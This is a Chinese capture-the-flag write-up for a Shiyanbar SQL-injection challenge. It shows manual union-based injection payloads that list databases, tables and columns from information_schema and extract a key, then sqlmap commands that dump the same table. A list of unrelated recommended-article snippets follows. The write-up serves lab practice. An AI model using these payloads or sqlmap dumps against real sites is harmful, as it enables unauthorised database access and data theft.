这个看起来有点简单分值:10

  • 来源: 西普学院
  • 难度:易

很明显。过年过节不送礼,送礼就送这个

格式:

解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1

解法:

1.手工注入

id=1'

id=1 and 1=1

id=1 and 1=2                          判断是sql注入

id=1 order by 2                       两个字节

id=1 union select 1,2               回显2

爆数据库:

and 1=2 union select 1,schema_name  from information_schema.schemata limit 0,2

information_schema     my_db

爆表:

and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,2

news           thiskey

爆字段:

and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,3

id        content           k0y

爆内容:

and 1=2 union select 1,k0y from thiskey

key=>           whati0MyD9ldump

sqlmap解法:

列 数据库:

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs

列表:

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables

列字段:

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns
这个跑不出来。直接用下面的可以,但是需要知道k0y。

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

得出结果,但是需要把1改为l,不知道为什么。

CTF 这个看起来有点简单相关推荐

  1. pytdx 获取板块指数_通达信券商版看板块指数简单方法

    新浪通达信行情主站加在券商版上看板块指数简单可行 方法是添加主站 1 如图 附地址 HostName01=新浪通达信北京电信主站 IPAddress01=tel1m.client.finance.si ...

  2. 软件咨询——并不像看上去那样简单

    软件咨询--并不像看上去那样简单 很多做过开发的都有过做咨询顾问的幻想--苦心钻研一门技术,然后成为这个领域的专家,穿梭于各种充满诱惑的华丽场所,给那些像热锅上的蚂蚁一样焦急的客户提出高明的建议,而客 ...

  3. 这个看起来有点简单!--实验吧

    这个看起来有点简单! 手工检测是否存在sql注入(经典id=1'加入单引号提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞) 使用sqlmap爆出当前数据库my_db 发现可能藏有key值的t ...

  4. [转载] python格式化字符串漏洞_从两道CTF实例看python格式化字符串漏洞

    参考链接: Python str.format()中的漏洞 >>> name = 'Hu3sky' >>> s = Template('My name is $na ...

  5. CTF MISC图片隐写简单题学习思路总结(持续更新)

    系列文章目录 第一篇文章: CTF Crypto简单题学习思路总结(持续更新) 文章目录 系列文章目录 前言 一.JPG类隐写 1.1 JPG文件末尾添加字符串 1.2 JPG文件中添加字符串 1.3 ...

  6. 第一次CTF【后台登录、简单的sql注入之、简单的sql注入之2、猫抓老鼠、i春秋 文件上传】

    后台登录 http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 根据md5($password,true)最后要得到原始二进制字符串,要含有or ,在or ...

  7. access insert语句怎么写_擦亮自己的眼睛去看SQLServer之简单Insert

    摘要:本来是打算先写SQLServer历史的,不过感觉写那部分内容比较难还需要多查些资料.于是调整了下顺序写下简单的Insert语句. 不过感觉写那部分内容比较难还需要多查些资料.于是调整了下顺序写下 ...

  8. ctf题目:看不见的flag_记一次江西省信息安全线下CTF比赛

    废话开篇 上学期,我在机房看红黑树的代码,被我们网络安全的老师看到了,于是就被拉去报名了信息安全的比赛,你们可能会很迷惑,写红黑树的代码和信息安全比赛有什么关系,我也这样想的,这有什么关系.. 当时报 ...

  9. Pandas入门超详细教程,看了超简单

    本文主要是对pandas新手入门详细介绍,通过本文你将系统性了解pandas为何会有数据分析界"瑞士军刀"的盛誉,下面请看内容如下: 01 关于pandas pandas,pyth ...

最新文章

  1. 我在大学毕业后学习Linux、python的一些经验
  2. 阿里云支撑马来西亚数字自由贸易区落地 帮助马来西亚中小企业参与全球贸易...
  3. CentOS系统双网卡路由设置
  4. php无限评论回复_php如何制作无限级评论功能?
  5. mysql+性能优化+命令_MySQL 性能优化及常用命令
  6. java阅读题_java 练习题
  7. 阿里程序员双11加班吃什么?
  8. kafka消息队列学习笔记
  9. 关于回复某个评论的功能小改进
  10. loss值多少才算收敛_库存究竟多少才算合理?
  11. Opencv图像数据结构剖析
  12. U9二开之UBF配置和档案开发
  13. 防火墙的原理、主要技术、部署及其优缺点
  14. Boson Netsim 思科路由器仿真 静态路由表、RIP、OSPF
  15. [转载]耗散结构理论与生住坏灭--开放.平衡.涨落.突变.
  16. 陈宏申:浅谈京东电商商品文案挖掘难点与优化实践
  17. Docker之操作系统Alpine
  18. mat-icon 翻转_案例研究-翻转网站以获取利润
  19. gm220s路由器怎么设置_二级路由器怎么设置_二级路由器设置图解教程-192路由网...
  20. 离线版百度地图瓦片下载html版

热门文章

  1. Memcache应用场景
  2. 回车 触发 提交事件
  3. apache+php+mysql+phpadmin 服务环境搭建
  4. 组播相对于单播和广播的优势
  5. div table 超出了_div包裹的table,table的宽度超出了的宽度,出现的滚动条的在windows下无法拖动...
  6. mysql datetime类型按天查询_mysql 时间相关sql , 按天、月、季度、年等条件进行查询...
  7. 部署到gcp_GCP 网络系统Andromeda --- 概述篇
  8. 【零散积累】 vim常用操作
  9. qtreewidget 获取根节点_详解去中心化信任根dRoT技术
  10. java jml_JML 入门